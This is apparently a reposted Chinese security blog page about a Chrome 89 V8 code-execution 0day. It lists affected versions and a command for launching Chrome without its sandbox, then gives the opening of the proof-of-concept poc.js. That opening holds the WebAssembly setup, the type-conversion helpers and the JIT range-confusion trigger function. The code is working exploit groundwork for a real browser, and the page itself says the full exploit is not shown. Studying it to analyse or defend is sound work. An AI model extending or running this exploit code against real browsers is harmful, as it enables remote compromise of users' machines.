Chrome浏览器代码执行0day漏洞
Chrome浏览器代码执行0day漏洞POC
适用版本
漏洞危害:远程代码执行（注意：本页公开的 PoC 只在渲染进程内执行代码，需要先关闭沙箱才能复现，见下文"测试需求"）
影响版本:Chrome 89.0.4389.114以下(含89.0.4389.114)；更高版本是否已修复，请以 Google 官方发布说明为准。
测试版本: 89.0.4389.114
测试需求:关闭沙箱环境
[scode type="share"]目前已泄露的 exp 需关闭沙箱环境才可执行：它只利用渲染进程（V8）中的漏洞，不包含沙箱逃逸，因此在默认开启沙箱的 Chrome 上不能直接达成远程代码执行。`--no-sandbox` 只应在隔离的测试环境中用于复现，切勿在日常浏览时使用。[/scode]
“C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” --test-type --no-sandbox
利用方式
引入poc.js
POC
poc.js
相关代码（说明：下面只是 poc.js 的开头片段——WebAssembly 模块、类型转换辅助函数和触发函数，不是完整的利用代码；从网页转载的代码请先核对运算符是否完整，位移等符号在网页中容易丢失）
// Minimal hand-assembled WebAssembly module (byte-for-byte the same as the
// original decimal listing, written in hex and grouped by section so it can
// be read). It exports one page of linear memory as "memory" and a
// zero-argument function "main" that returns the i32 constant 42. The rest
// of the PoC is not reproduced on this page; presumably it works with the
// instance/function objects created here rather than with what main()
// computes — confirm against the full script before relying on that.
var wasm_code = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d,                         // "\0asm" magic
  0x01, 0x00, 0x00, 0x00,                         // version 1
  // type section: one signature, () -> i32
  0x01, 0x85, 0x80, 0x80, 0x80, 0x00, 0x01, 0x60, 0x00, 0x01, 0x7f,
  // function section: one function using type 0
  0x03, 0x82, 0x80, 0x80, 0x80, 0x00, 0x01, 0x00,
  // table section: one funcref table, min 0
  0x04, 0x84, 0x80, 0x80, 0x80, 0x00, 0x01, 0x70, 0x00, 0x00,
  // memory section: one memory, min 1 page
  0x05, 0x83, 0x80, 0x80, 0x80, 0x00, 0x01, 0x00, 0x01,
  // global section: empty
  0x06, 0x81, 0x80, 0x80, 0x80, 0x00, 0x00,
  // export section: "memory" (memory 0) and "main" (func 0)
  0x07, 0x91, 0x80, 0x80, 0x80, 0x00, 0x02,
  0x06, 0x6d, 0x65, 0x6d, 0x6f, 0x72, 0x79, 0x02, 0x00,
  0x04, 0x6d, 0x61, 0x69, 0x6e, 0x00, 0x00,
  // code section: one body, no locals: i32.const 42; end
  0x0a, 0x8a, 0x80, 0x80, 0x80, 0x00, 0x01,
  0x84, 0x80, 0x80, 0x80, 0x00, 0x00, 0x41, 0x2a, 0x0b,
]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

// One 8-byte buffer viewed both as a double and as two uint32 words; the
// ftoi() helper further down reinterprets bit patterns through these views.
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
// Not referenced in the part of the PoC shown on this page.
let buf2 = new ArrayBuffer(0x150);
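/**
 * Reinterpret the 64 bits of a double as an unsigned BigInt.
 *
 * Writes `val` into the shared f64_buf view and reads the same bytes back
 * through the u64_buf (Uint32Array) view, so the result assumes a
 * little-endian host (low word at index 0), which is what this PoC targets.
 *
 * The listing as reposted had the shift operator mangled to `>` (an HTML
 * extraction artifact), which turned the high word into a boolean and made
 * the function return garbage; it also carried an unreachable second
 * `return f64_buf[0];` that belongs to the inverse helper, not here.
 *
 * @param {number} val - any double, including NaN and +/-Infinity
 * @returns {bigint} the IEEE-754 bit pattern of val, in 0n .. 2**64-1
 */
function ftoi(val) {
  f64_buf[0] = val;
  return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}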
// Single-element u32 array holding 2**31 (0x80000000). foo() reads it as its
// int32 source; presumably it lives in a typed array rather than as a literal
// inside foo so the value is not a compile-time constant — do not inline it.
const _arr = Uint32Array.of(2 ** 31);
// Trigger function of the PoC. Do not simplify, reorder or "clean up" the
// arithmetic: x is deliberately pushed through ^, Math.abs, Math.max and
// two subtractions so that, evaluated as plain JS, it is always 0:
//   _arr[0] ^ 0 -> 2**31 coerced to int32 = -2147483648; +1 -> -2147483647
//   Math.abs    -> 2147483647; -= 2147483647 -> 0; Math.max(0, 0) -> 0
//   -= 1        -> -1; the if() resets it to 0
// so new Array(x) is an empty array in the interpreter. The point is
// presumably that an optimizing compiler derives a different range for x
// than the value actually produced; the call loop and later steps are not
// on this page, so that cannot be confirmed from here. `a` is unused.
// Returns [arr, cor]: the (empty, when interpreted) array after shift() and
// a three-element double array; both are presumably consumed by the missing
// remainder of the script — leave them as written.
function foo(a) {
var x = 1;
x = (_arr[0] ^ 0) + 1;
x = Math.abs(x);
x -= 2147483647;
x = Math.max(x, 0);
x -= 1;
if(x==-1) x = 0;
var arr = new Array(x);
arr.shift();
var cor = [1.1, 1.2, 1.3];
return [arr, cor];
}